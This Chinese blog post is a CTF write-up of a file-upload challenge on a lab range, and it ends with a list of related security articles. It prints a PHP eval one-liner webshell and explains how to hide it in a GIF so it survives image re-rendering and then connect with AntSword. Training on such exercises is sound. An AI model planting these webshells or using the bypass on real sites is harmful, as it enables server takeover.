时隔四天,终于把这道文件上传漏洞题做出来了。
这里附上各种一句话木马大全
先看题:
说明了文件保存路径./upload
。点击展示发现有.htaccess
文件,还有一个flag.php
文件
在文本框中输入.htaccess
,点击预览,出现下面这句话。但输入flag.php
,会弹框说不能直接操作flag文件。看下面这句话我们可以知道:在./upload目录下,文件名为098f6bcd4621d373cade4e832627b4f6.gif
的文件可以php代码解析出来。所以可以想到要上传一个图片马,而且文件名为098f6bcd4621d373cade4e832627b4f6.gif
但看下图,若我们随便上传一个图片,文件名都会被改变。这里我上传了2.gif
文件
所以要思考怎样才能让上传后的文件名能为098f6bcd4621d373cade4e832627b4f6.gif
。于是我想到看看直接输入下面这个url会怎样
http://120.79.135.77:10002/range/upload/flag.php
结果出现了这一幕,既然它出现了就一定是有问题的(然而我一开始发现的时候却并没有在意它),然后随便点开看了一下,就知道了是用MD5加密
使文件名改变的。
然后将098f6bcd4621d373cade4e832627b4f6
解密得是test
。也就是说我们只要将文件名为test.gif
的文件上传,就能被保存为098f6bcd4621d373cade4e832627b4f6.gif
然后我们开始制作图片马。在shell.php
文件中写入下面这个一句话木马,然后在命令行输入copy 2.gif /b + shell.php /a test.gif
,2.gif
是一个普通图片,得到的test.gif
就是我们要的图片马了
<? @eval($_REQUEST[x]);?>
然后将test.gif
上传,下载后的图片用010 Editor
打开却发现php代码不见了,这时就想到是二次渲染
,那就将原图和下载的图片比较,然后在相同部分插入一句话木马。
【就是做这一步花了我好久时间,我知道是二次渲染,试了好多次插入一句话木马,但保存后的图片的马还是不见了,直到今天,在最前面的蓝色部分(相同部分)插入马,终于成功—多尝试,细节细节细节!!】
在蚁剑中连接得到flag
时隔四天,终于把这道文件上传漏洞题做出来了。相关推荐
- 安全服务面试总结(第四弹 文件上传漏洞)
文件上传漏洞与sql注入相比,风险更大,如何web应用程序存在上传漏洞,攻击者甚至可以直接上传webshell到服务器. 常见的解析漏洞 IIS5.x~6.x解析漏洞 ①当建立.asp .asa的文件 ...
- wmm的学习日记(文件上传漏洞)
这个星期正式学习了一下文件上传漏洞,虽然之前也有接触过这样的题目,但还是云里雾里的感觉.现在应该可以不靠题解完完全全靠自己的脑子做一些简单的题目啦.接下来就让我浅浅总结一下吧. 目录 文件上传漏洞简介 ...
- 太厉害了,终于有人能把文件上传漏洞讲的明明白白了
大家好! 我是小黄,很高兴又跟大家见面啦 ! 拒绝水文,从我做起 !!!! 未经允许,禁止转载 ,违者必究!!!! 本实验仅适用于学习和测试 ,严禁违法操作 ! ! ! 今天更新的是: P7 漏洞类型 ...
- [网络安全提高篇] 一〇四.网络渗透靶场Oracle+phpStudy本地搭建万字详解(SQL注入、XSS攻击、文件上传漏洞)
当您阅读到该篇文章时,作者已经将"网络安全自学篇"设置成了收费专栏,首先说声抱歉.感谢这一年来大家的阅读和陪伴,这100篇安全文章记录了自己从菜鸡到菜鸟的成长史,该部分知识也花了很 ...
- 文件上传漏洞——upload-labs(11-20)
前言:上次文件上传漏洞学习到第十关,这次继续学习 第十一关 分析源码 前面几行代码都是对后缀名进行限制,最重要的就是这一句代码 $img_path = $_GET['save_path']." ...
- 文件上传漏洞——upload-labs(1-10)
前言:文件上传漏洞有很多种绕过技巧,这次就通过upload-labs进行学习 第一关 上传有限制,只让上传JPEG或PNG格式的图片,就先尝试一下抓包修改上传格式的方法看看是否可行 先将一句话木马PH ...
- 织梦guestbook.php漏洞,DEDE:织梦漏洞修复(含任意文件上传漏洞与注入漏洞)
这几天阿里频繁提醒网站有漏洞,搞得我不胜其烦,好吧,我修复还不行吗?搜索之后整理如下,仅供参考(5.7以上版本适用): 任意文件上传漏洞修复 一./include/dialog/select_soft ...
- .hpp文件_文件上传漏洞另类绕过技巧及挖掘案例全汇总
文件上传漏洞作为获取服务器权限最快的方式,虽然相关资料很多,但很多人对上传校验方式.如何针对性绕过检测.哪种上传和解析的场景会产生危害等还是比较模糊.本文作一些阐述,然后补充一些除了上传webshel ...
- FireEye 红队失窃工具大揭秘之:分析复现 Zoho 任意文件上传漏洞(CVE-2020-8394)
聚焦源代码安全,网罗国内外最新资讯! 前言 最近,全球领先的网络安全公司 FireEye 疑遭某 APT 组织的攻击,其大量政府客户信息遭越权访问,且红队工具被盗.虽然目前尚不清楚这些红队工具将被如 ...
最新文章
- python恶搞小程序-知道了这个,你也能写出 Python 趣味小程序
- html5的新增的标签和废除的标签
- 伸展树 Splay 模板
- python3连接mysql使用mysqldb_Python3 连接Mysql数据库
- pcie ep 应该支持哪种interrupt_7寸国产笔记本评测,酷睿处理器+8G+256G,还支持手写笔...
- Mac idea使用Command + p 快捷键查看一个类的构造函数需要传入什么参数
- Ubuntu环境下,使用clion编译器,使用开源opensll的对称AES算法对于文件进行加密,C++代码
- Redis如何实现刷抖音不重复-布隆过滤器(Bloom Filter)
- WindowsMobile应该如何发展?(未完待续)
- Git 删除所有文件
- Array.prototype.slice.call()如何工作?
- 中望CAD的引线标注格式怎么改_大神总结的CAD设计五个段位 快来看看你在哪个阶段...
- react 遍历渲染
- DirectShow基础类库开发参考文档
- struts2 从一个action 跳转到另一个action的两种方法
- Switch函数的使用
- [杂记]就《10.30日华为HR体验官胡玲在心声论坛爆料内部HR腐败行为》有感
- 2、趋势科技2017校招开发岗试题
- 模拟游戏在设计上是如何处理对仿真性的追求的?
- 0基础学php燕十八,燕十八PHP公益培训 PHP基础视频教程 (60集全)